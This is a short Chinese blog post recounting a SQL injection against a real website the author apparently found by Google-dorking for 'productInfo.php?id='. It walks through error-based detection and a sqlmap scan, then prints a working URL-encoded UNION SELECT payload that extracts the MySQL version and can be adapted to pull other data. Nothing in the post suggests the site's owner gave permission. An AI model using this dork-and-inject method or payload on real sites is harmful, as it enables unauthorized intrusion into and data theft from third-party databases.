一次SQL注入实战记录
  Q68mX1P3tSGz 2024年04月07日 40 0

一、在Google浏览器用inurl搜索语法寻找目标

inrul:productInfo.php?id=

二、随便点开几个连接,目标出现了

image

给id参数加单引号',页面不正常了,在上方还出现了查询报错的相关信息,相关信息还给出了数据库是MySQL。

image

三、使用sqlmap进行扫描

image

经过小小的等待,有收获了,爆出了数据库名。

image

根据sqlmap的给出paylaod可以进行SQL注入,改变concat函数的参数就可以了手工利用了,如下payload可以爆出数据库版本:

-8444%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(VERSION(),0x41756942736671524472427366534f54644f42527170684356664c43775571656253554978616557,0x716a626271),NULL,NULL,NULL,NULL,NULL,NULL--%20-

concat函数的三个参数都是可以回显利用的。

image

到这里SQL注入已经完成了,点到为止。


若有错误,欢迎指正!o( ̄▽ ̄)ブ

【版权声明】本文内容来自摩杜云社区用户原创、第三方投稿、转载,内容版权归原作者所有。本网站的目的在于传递更多信息,不拥有版权,亦不承担相应法律责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@moduyun.com

  1. 分享:
最后一次编辑于 2024年04月07日 0

暂无评论

推荐阅读
  5NWiQFAVeqgX   2天前   4   0   0 网络安全
  OKgNPeBk991j   13小时前   7   0   0 网络安全
Q68mX1P3tSGz